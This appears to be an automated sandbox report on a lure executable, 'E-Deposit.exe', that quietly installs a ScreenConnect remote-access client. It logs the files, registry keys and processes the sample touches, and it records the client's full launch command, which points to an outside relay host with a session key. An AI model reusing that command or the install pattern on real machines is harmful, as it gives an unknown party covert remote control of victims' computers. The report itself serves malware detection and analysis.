                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  System Summary

                                  barindex
                                  Source: E-Deposit.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_053101F0 CreateProcessAsUserW,8_2_053101F0
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\598740.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI89D0.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI89E1.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8F8F.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\598742.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\598742.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\yztrzu4s.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\yztrzu4s.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\qhvcbphl.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\qhvcbphl.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ctnhqxor.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ctnhqxor.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\1fqihhdx.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\1fqihhdx.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\l3l2bibw.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\l3l2bibw.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cjyqv33i.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cjyqv33i.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\o2yr255r.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\o2yr255r.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\3cneracl.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\3cneracl.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rncfvb0i.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rncfvb0i.newcfgJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI89E1.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B587B80_2_05B587B8
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B5BA300_2_05B5BA30
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B587A80_2_05B587A8
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B57D800_2_05B57D80
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B70CB80_2_05B70CB8
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B71E9B0_2_05B71E9B
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_00F5D5688_2_00F5D568
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_0531C6DE8_2_0531C6DE
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_0531CE108_2_0531CE10
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848A0A1809_2_00007FF848A0A180
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF8489D70DD9_2_00007FF8489D70DD
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF8489D10D79_2_00007FF8489D10D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF8489D10CF9_2_00007FF8489D10CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848CE6F6D9_2_00007FF848CE6F6D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848CE652B9_2_00007FF848CE652B
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000007DF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000007DF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2023108694.0000000003200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2028229479.000000000440F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2031799419.0000000005E1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2031799419.0000000005E1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2031799419.0000000005E1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2031799419.0000000005E1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2029985839.0000000005960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2029985839.0000000005960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2029985839.0000000005960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2029690495.00000000057F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2029395262.0000000005760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.2035925464.000000000817E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
                                  Source: E-Deposit.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.E-Deposit.exe.2b63d4.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.2.E-Deposit.exe.5760000.1.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.2.E-Deposit.exe.5960000.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.E-Deposit.exe.33c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.2.E-Deposit.exe.5960000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.E-Deposit.exe.5960000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.E-Deposit.exe.5960000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal66.evad.winEXE@15/63@1/1
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)Jump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E-Deposit.exe.logJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: E-Deposit.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: E-Deposit.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8413.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5866656 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: E-Deposit.exeVirustotal: Detection: 31%
                                  Source: E-Deposit.exeReversingLabs: Detection: 26%
                                  Source: E-Deposit.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: E-Deposit.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile read: C:\Users\user\Desktop\E-Deposit.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\E-Deposit.exe "C:\Users\user\Desktop\E-Deposit.exe"
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0753C52DEC0A493B425F25C67CDC614C C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8413.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5866656 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FCB4ADDE1767C5B22D934331E22A67F2
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9CCC608124B9911F2B52810F2F7C9978 E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=2d5fcbc9-2c6e-47f4-840c-d5cb02c072a5&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "24f3f134-385f-4f81-b2ec-597f84d7215f" "User"
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0753C52DEC0A493B425F25C67CDC614C CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FCB4ADDE1767C5B22D934331E22A67F2Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9CCC608124B9911F2B52810F2F7C9978 E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8413.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5866656 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "24f3f134-385f-4f81-b2ec-597f84d7215f" "User"Jump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
